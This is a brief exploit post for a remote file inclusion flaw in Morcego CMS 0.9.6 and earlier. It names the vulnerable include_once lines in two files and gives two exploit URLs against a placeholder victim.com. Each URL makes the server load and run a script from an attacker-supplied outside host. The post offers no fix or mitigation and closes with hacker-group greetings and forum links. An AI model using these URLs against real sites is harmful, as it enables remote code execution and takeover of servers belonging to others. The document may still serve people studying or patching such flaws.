===================================================================== # Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability ===================================================================== # Author : Le CoPrA ===================================================================== # Download Script : http://www.linkini.net/phpscripts/descargas/Portales%20PHP%20(13%20Archivos)/Morcego%20CMS%200.9.6.0.zip ===================================================================== # Bugs in (1) includes/morcegoCMS/morcegoCMS.php (2) includes/morcegoCMS/adodb/adodb.inc.php # Vuln Code 1 : include_once($fichero); # Vuln Code 2 : include_once($path); $class = "ADODB2_$drivername"; ===================================================================== # Exploits : http://www.victim.com/[path]/includes/morcegoCMS/morcegoCMS.php?fichero=|SCRIPT-URL| http://www.victim.com/[path]/includes/morcegoCMS/adodb/adodb.inc.php?path=|SCRIPT-URL| ===================================================================== # Discovered by : Le CoPrA # ConTaCT : Le.CoPrA |at| Hotmail |dot| CoM # Special Greetz FlyinG 2 || Str0ke || # Greetz4// alkasrgolden, LovER BoY, Saudi Hackrz, HACKERS PAL, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64 3theaby geer,Mohajer22,Qaher_Yhod,MR.WOLF,cRiMiNaL NeT,al3iznet,Abdullah-00 ,egyptghost,ToOoFA,KaBaRa,HakrAwY # Channel : wWw.TrYaG.cOm/vb || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com ===========================================================================================================================